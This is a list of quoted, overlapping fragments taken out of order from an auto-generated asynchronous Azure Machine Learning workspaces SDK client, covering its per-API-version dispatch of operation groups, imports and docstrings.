base_url: str :param profile: A profile definition, from KnownProfiles to", "import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as", "..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not have", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API", "@property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\"", "version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>`", "the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` *", ":class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version ==", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version", "from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations", "version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the", "== 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {}", "class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine", "on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version =", "raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config,", "particular api-version and/or profile. The profile sets a mapping between an operation group", "import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version:", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise", "DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version", "operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends", "Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config,", "ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the", "not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self):", "API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview':", "= self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else:", "on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>`", "API versions, to help you deal with all of the Azure clouds (Azure", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01':", "version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version))", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version", "Code Generator. # Changes may cause incorrect behavior and will be lost if", "from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "@property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\"", "'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the", "= self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else:", "return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif", ":class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version ==", "not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self):", "..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version))", "{} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends", "__init__(self, *args, **kwargs): \"\"\"This is a fake class to support current implemetation of", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else:", "{} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "= self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client,", "api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass", "operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: *", "'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory", "not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self):", "'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions':", "EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass", "def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview:", "from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config,", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version =", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01':", "import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as", "api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version", ":class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations", "models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version", "on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version", "group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version", "* 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions')", "spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version =", "'1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does", "{} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01':", "China, etc.). By default, it uses the latest API version available on public", "# # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may", "from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview':", ":class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations", "Azure Government, Azure China, etc.). By default, it uses the latest API version", "depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01:", "version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version =", "* 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01:", "Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>`", ":class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations", "2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client,", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version:", "does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: *", "API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0':", "DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass", "have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance", "from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not", "not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self):", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version", "depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01:", "if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API", "\"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API", "2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from", "'2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance", "-> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces,", "1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01:", "def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version", "version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version =", "usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>`", "jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>`", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: *", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else:", "not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self):", "== '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {}", "== '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>`", "ID of the target subscription. :type subscription_id: str :param api_version: API version to", "..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version))", "group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version", "from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import", "ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "== '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {}", "@property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\"", "'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the", "* 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "to support current implemetation of MultiApiClientMixin.\" Will be removed in final version of", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version", "== '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from", ":class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations", "..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations", "..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations", ":type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version: *", "def events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version", ":class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations", "import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as", "self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise", "import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "(R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif", "else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client,", "depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01:", "QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise", "'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API", "api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version", "2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01':", "Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>`", "group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: *", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: 